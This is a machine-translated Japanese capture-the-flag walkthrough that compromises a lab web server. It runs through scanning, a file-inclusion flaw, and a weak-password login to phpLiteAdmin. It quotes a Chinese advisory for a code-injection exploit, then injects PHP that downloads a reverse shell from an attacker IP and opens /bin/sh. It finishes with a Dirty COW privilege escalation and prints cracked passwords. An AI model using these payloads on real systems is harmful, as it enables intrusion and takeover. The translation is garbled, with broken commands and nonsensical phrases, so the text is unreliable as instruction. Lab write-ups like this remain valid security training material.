メッセージを収集する
ホストの発見
nmap -sV
宛先IPアドレスは192.168.133.134です。
ポートスキャン
マスカンを使用する:
masscan --rate = 10000 --port 0-65535 192.168.133.134
nmapを使用して、バージョンなどの情報を検出します。
プローブCMS
whatwebを使用します。
ディレクトリスキャン
脆弱性の発見
このページのURLのページ変数の値がhtmlファイルである
ことがわかりました。tools.htmlに直接アクセスできます。直接アクセスできます。ファイルインクルードが使用されていると推測され、ファイルが存在する可能性があります。インクルードの脆弱性。
手動で試してください
。ファイルインクルードの脆弱性があります。
エクスプロイト
ディレクトリスキャンで、dbadmin(db-database?admin-familiar admin)があることがわかりました。次のサイトに
アクセスしてください。
phpファイル:
データベースのログインページを開き、バージョン情報を入力します。
弱いパスワードでログインしてみてください:
管理者によるログインの成功:
2人のユーザーに関する情報を取得しました。
復号化、最終的な対応は次のとおりです。
root–34kroot34 zico
–zico2215 @
sshリモートログインを試してください:
失敗。
searchsploitを使用する:
txtコンテンツを表示する(直接翻訳):
#漏洞标题:phpliteadmin<=1.9.3远程PHP代码注入漏洞
#谷歌怪人:inurl:phpliteadmin.php文件(默认密码:admin)
#日期:2013年10月1日
#利用作者:L@usch公司- http://la.usch.io-http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
#供应商主页:http://code.google.com/p/phpliteadmin/
#供应商状态:通知
#软件链接:http://phpliteadmin.googlecode.com/files/phpliteadmin\u v1-9-3.zip
#版本:1.9.3
#测试环境:Windows和Linux
说明:
phpliteadmin.php#1784:'创建新数据库'=>
phpliteadmin.php#1785:'创建新数据库时,如果您自己不包括该数据库,则输入的名称将附加相应的文件扩展名(.db、.db3、.sqlite等)。数据库将在指定为$directory变量的目录中创建。“,
攻击者可以使用php扩展创建sqlite数据库,并将php代码作为文本字段插入。完成后,攻击者只需使用Webbrowser访问数据库文件即可执行该操作。
概念证明:
1我们创建了一个名为“黑客.php".
(取决于服务器配置,有时它将不起作用,数据库的名称将为“黑客.sqlite". 然后尝试将数据库/现有数据库重命名为“黑客.php".)
脚本将sqlite数据库存储在phpliteadmin.php文件.
预览:http://goo.gl/B5n9O
十六进制预览:http://goo.gl/lJ5iQ
2现在在此数据库中创建一个新表,并插入一个具有默认值的文本字段:
<?php phpinfo()?>
十六进制预览:http://goo.gl/v7USQ
三。现在我们跑黑客.php
多恩
内容によると、テスト:
phpinfoの挿入:
ファイルインクルードの脆弱性によるローカルインクルード:
phpinfo情報を返し、構成を確認すると、リモートインクルードがオンになりません。
リモートダウンロードコマンドを記述し、シェルスクリプトをダウンロードします。
<?php system("wget IP地址/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>
-Oは指定されたディレクトリに出力します。
/ tmpディレクトリに必要な権限が低いため、このディレクトリに出力します。
shell.txtの内容は次のとおりです。
<?php $sock=fsockopen("IP地址",监听端口);exec("/bin/sh -i <&3 >&3 2>&3")?>
このステートメントをリバースシェルのデータベースに直接挿入すると、接続は失敗します。
したがって、リモートダウンロードを介して。
まず、shell.txtファイルを作成します。
httpサービスをオンにします。
インサート:
<?phpsystem( "wgetIPアドレス/shell.txt-O/tmp/shell.php; php /tmp/shell.php");?>
ローカルインクルードを実行して監視
します。シェルに正常に戻ります。
右エスカレーション
rootユーザーのパスワードは以前にデータベースから取得されており、特権をエスカレートしようとしました。
ここでターミナルを開く必要があります。
Pythonを使用して、ターミナルを開きます。
python -c 'import pty; pty.spawn("/bin/bash")';
権利のエスカレーションに失敗しました:
汚れた牛を使用して権利をエスカレーションします。
1.ダーティカウスクリプトファイルをリモートでダウンロードします。
ダウンロードが失敗したことがわかりました。
権限の表示:
権限の付与:
tmpディレクトリへの入力:
正常なダウンロード:
コンパイルして実行します。
gcc -pthread dirty.c -o exp -lcrypt // expは出力ファイル名です(固定形式)
パスワードを123(オプション)に設定します。
権利の拡大は成功しました。
総括する
脆弱性を含むファイルが発見された場合は、脆弱性の検証を強化する必要があります。
searchsploitを使用して脆弱性を悪用する方法を学びました。
権限をエスカレートするときは、/ tmpディレクトリの使用を強化する必要があります。
汚れた牛がエスカレーションに成功した後、元の/ etc / passwdを復元する必要があります。